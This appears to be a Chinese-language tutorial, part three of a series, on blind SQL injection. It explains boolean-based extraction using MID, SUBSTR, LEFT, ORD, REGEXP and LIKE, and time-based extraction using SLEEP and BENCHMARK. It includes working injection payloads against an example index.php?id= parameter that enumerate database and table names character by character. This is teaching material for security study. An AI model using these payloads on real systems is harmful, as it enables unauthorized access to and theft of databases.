sql注入(三)盲注

何为盲注？
　　盲注就是在sql注入过程中，执行语句后，选择的数据不能回显到前端页面，此时我们需要利用一些方法进行判断或尝试，这个过程称之为盲注。盲注可以分布尔盲注和时间盲注。

布尔盲注——构造逻辑判断

　　三大法宝mid(),left(),substr()

　　mid()函数

　　此函数为截取字符串一部分。MID(column_name,start[,length])

Sql用例：

（1）MID(DATABASE(),1,1)>’a’,查看数据库名第一位，MID(DATABASE(),2,1)查看数据库名第二位，依次查看各位字符。

（2）MID((SELECT table_name FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=xxxxxxx LIMIT 0,1),1,1)>’a’此处column_name参数可以为sql语句，可自行构造sql语句进行注入。

　　substr()函数

Substr()和substring()函数实现的功能是一样的，均为截取字符串。

string substring(string, start, length)

string substr(string, start, length)

参数描述同mid()函数，第一个参数为要处理的字符串，start为开始位置，length为截取的长度。

　　Left()函数

Left()得到字符串左部指定个数的字符

Left ( string, n )        string为要截取的字符串，n为长度。

Sql用例：

(1) left(database(),1)>’a’,查看数据库名第一位，left(database(),2)>’ab’,查看数据库名前二位。

(2) 同样的string可以为自行构造的sql语句。

同时也要介绍ORD()函数，此函数为返回第一个字符的ASCII码，经常与上面的函数进行组合使用。

例如ORD(MID(DATABASE(),1,1))>114 意为检测database()的第一位ASCII码是否大于114，也即是‘r’

　　REGEXP正则注入

1. 判断第一个表名的第一个字符是否是a-z中的字符,其中blind_sqli是假设已知的库名。

注：正则表达式中 ^[a-z] 表示字符串中开始字符是在 a-z范围内

index.php?id=1 and 1=(SELECT 1 FROM information_schema.tables WHERE TABLE_SCHEMA="blind_sqli" AND table_name REGEXP '^[a-z]' LIMIT 0,1) /*

2. 判断第一个字符是否是a-n中的字符

index.php?id=1 and 1=(SELECT 1 FROM information_schema.tables WHERE TABLE_SCHEMA="blind_sqli" AND table_name REGEXP '^[a-n]' LIMIT 0,1)/*

3. 确定该字符为n

index.php?id=1 and 1=(SELECT 1 FROM information_schema.tables WHERE TABLE_SCHEMA="blind_sqli" AND table_name REGEXP '^n' LIMIT 0,1) /*

4. 表达式的更换如下

expression like this: '^n[a-z]' -> '^ne[a-z]' -> '^new[a-z]' -> '^news[a-z]' -> FALSE

这时说明表名为news ，要验证是否是该表明 正则表达式为'^news$'，但是没这必要 直接判断 table_name = ’news‘ 不就行了

　　LIKE匹配注入　　

例如：select user() like ‘ro%’

和上述的正则类似,MYSQL可以用LIKE进行匹配　

　　时间盲注——延时注入

If(ascii(substr(database(),1,1))>115,0,sleep(5))%23 　　

//if 判断语句，条件为假， 执行 sleep

UNION SELECT IF(SUBSTRING(current,1,1)=CHAR(119),BENCHMARK(5000000,ENCODE(‘M SG’,’by 5 seconds’)),null) FROM (select database() as current) as tb1;

　　//BENCHMARK(count,expr)用于测试函数的性能，参数一为次数，二为要执行的表达 式。可以让函数执行若干次，返回结果比平时要长，通过时间长短的变化，判断语句是否执 行成功。在运行过程中占用大量的 cpu 资源。推荐使用 sleep()。

此处配一张白帽子讲安全图片